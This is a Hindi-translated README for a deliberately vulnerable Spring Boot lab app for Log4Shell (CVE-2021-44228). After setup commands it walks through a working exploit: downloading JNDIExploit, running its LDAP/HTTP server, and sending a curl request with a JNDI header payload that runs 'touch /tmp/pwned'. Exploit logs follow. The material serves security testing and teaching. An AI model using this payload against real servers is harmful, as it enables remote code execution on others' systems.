
Spring Boot वेब एप्लिकेशन CVE-2021-44228 के लिए असुरक्षित है, जिसे Log4Shell उपनाम दिया गया है।
इस रिपॉजिटरी में एक Spring Boot वेब एप्लिकेशन है जो CVE-2021-44228 के प्रति संवेदनशील है, जिसे Log4Shell उपनाम दिया गया है।
यह Log4j 2.14.1 (spring-boot-starter-log4j2 2.6.1 के माध्यम से) और JDK 1.8.0_181 का उपयोग करता है।

इसे चलाएं:
docker run --name vulnerable-app -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app
इसे स्वयं बनाएं (आपको किसी Java-संबंधित उपकरण की आवश्यकता नहीं है):
docker build . -t vulnerable-app
docker run -p 8080:8080 --name vulnerable-app vulnerable-app
नोट: यह मूल LunaSec सलाह से अत्यधिक प्रेरित है। ।
अपडेट (13 दिसंबर): JNDIExploit रिपॉजिटरी को GitHub से हटा दिया गया है (संभवतः, GitHub द्वारा नहीं)। नीचे दिए गए JNDIExploit डाउनलोड URL के सामने web.archive.org जोड़कर Wayback Machine द्वारा कैश किए गए संस्करण का उपयोग करें।
wget https://github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zip
unzip JNDIExploit.v1.2.zip
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i your-private-ip -p 8888
# 'touch /tmp/pwned' निष्पादित करेगा
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://your-private-ip:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'
[+] LDAP Server Start Listening on 1389...
[+] HTTP Server Start Listening on 8888...
[+] Received LDAP Query: Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo
[+] Paylaod: command
[+] Command: touch /tmp/pwned
[+] Sending LDAP ResourceRef result for Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo with basic remote reference payload
[+] Send LDAP reference result for Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo redirecting to http://192.168.1.143:8888/Exploitjkk87OnvOH.class
[+] New HTTP Request From /192.168.1.143:50119 /Exploitjkk87OnvOH.class
[+] Receive ClassRequest: Exploitjkk87OnvOH.class
[+] Response Code: 200
/tmp/pwned.txt बनाई गई थी:$ docker exec vulnerable-app ls /tmp
...
pwned
...
https://www.lunasec.io/docs/blog/log4j-zero-day/ https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/